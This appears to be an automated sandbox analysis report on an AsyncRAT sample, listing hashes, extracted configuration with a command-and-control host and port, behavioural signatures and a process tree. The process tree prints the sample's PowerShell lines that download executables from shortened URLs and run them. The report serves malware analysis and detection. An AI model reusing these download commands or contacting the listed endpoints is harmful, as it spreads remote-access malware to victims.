Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 10:24
Static task
static1
Behavioral task
behavioral1
Sample
d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe
Resource
win7-20240704-en
General
-
Target
d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe
-
Size
309KB
-
MD5
6940553fce65b288660a664eb039ffe2
-
SHA1
8687dc9a6dc0f4b65035bcc76a5e6785eedf66e1
-
SHA256
d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f
-
SHA512
044430fecd45f6119bf06c1ad4a3e7cd02464f579bd901ee883f12c05429812d0181b2fdf918db8a2f0070f7ccec184de0b11ba139a138a48bc45f3508041dc4
-
SSDEEP
6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40X9U:IzxzTDWikLSb4NS7t2X+t40X9U
Malware Config
Extracted
https://tinyurl.com/m58snm44
Extracted
https://tinyurl.com/yc3v5z49
Extracted
asyncrat
Default
127.0.0.1:7620
matter-ivory.gl.at.ply.gg:7620
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0009000000023443-50.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 21 4584 powershell.exe 23 4584 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation le.exe -
Executes dropped EXE 2 IoCs
pid Process 3212 le.exe 1692 Infected.exe -
pid Process 1084 powershell.exe 4584 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1084 powershell.exe 1084 powershell.exe 4584 powershell.exe 4584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 1692 Infected.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 860 wrote to memory of 1452 860 d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe 86 PID 860 wrote to memory of 1452 860 d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe 86 PID 860 wrote to memory of 1452 860 d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe 86 PID 1452 wrote to memory of 1084 1452 cmd.exe 90 PID 1452 wrote to memory of 1084 1452 cmd.exe 90 PID 1452 wrote to memory of 1084 1452 cmd.exe 90 PID 1452 wrote to memory of 4584 1452 cmd.exe 91 PID 1452 wrote to memory of 4584 1452 cmd.exe 91 PID 1452 wrote to memory of 4584 1452 cmd.exe 91 PID 1452 wrote to memory of 3212 1452 cmd.exe 96 PID 1452 wrote to memory of 3212 1452 cmd.exe 96 PID 1452 wrote to memory of 3212 1452 cmd.exe 96 PID 3212 wrote to memory of 1692 3212 le.exe 97 PID 3212 wrote to memory of 1692 3212 le.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe"C:\Users\Admin\AppData\Local\Temp\d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/m58snm44', 'file.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/yc3v5z49', 'le.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\le.exele.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
Filesize
14KB
MD5da87825f97636a819543ddcc6a87c5f0
SHA1f6ec7d6ecc8417ece6ee48e7e3ed05b939f9495a
SHA256ebc0d535f6d5542d36bb5c7c5445fcc98d37c57a5d26231416cdfe3c6e1c1a39
SHA5120955ce95dd92e58d78a1979932e6ea61a6e20f47f4dd9c3e8b809f5cd4d684080da60e186a2355907a0d2220eb5e36207356b2f1f344c635d88654cc1530d074
-
Filesize
337KB
MD5dbe710354bababe1dcae3c50bac53e1b
SHA19041128198280b7d23495e4cd87f5dce1c3148a5
SHA25675a000fc84f6fe726d74ecd731667b035d4582bf327e6d493854e7cd2426eccd
SHA512950ce5b06bffc34f69549925c2b7b40fa6155920201791efa97a5cdbaa305f14adcd906dc93b6e9797d20f29fd394a1d57db2a3cf9f643e329eb854f09ccad45
-
Filesize
287B
MD5e072208f0724637156d508b89db54154
SHA1ba65e528c56726d34e123bced6d6a3cd26e2cf0a
SHA25629d168033c119e30aa7939abb96631d2714fb1051d4a25369074047abcca6fda
SHA5120fabd9faeab61048e7adbcfb9c76b841640a17f26fed512bea0f29222a8a5fe8667eb023c171c3b14735fda000c021e4cdd157f7fcd0cddef917d77adae9be17
-
Filesize
63KB
MD5443839fb3524964b6c933d7db3adaa2d
SHA1b546ecb5afc2417a75df4f7bc327a0d7cfb7f43f
SHA2560edc71223f931255d1611bce6f5a7ff6b671e44a5eae5a8caf15f0db76e58195
SHA51210786e5f2c6032d61bd59b491145f1bc399c6902c9bc707e4ad934e4899a82cc1c18e45267bffd4f9fe9fef468d1c6e1939664755047fd5e855a279468c102d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82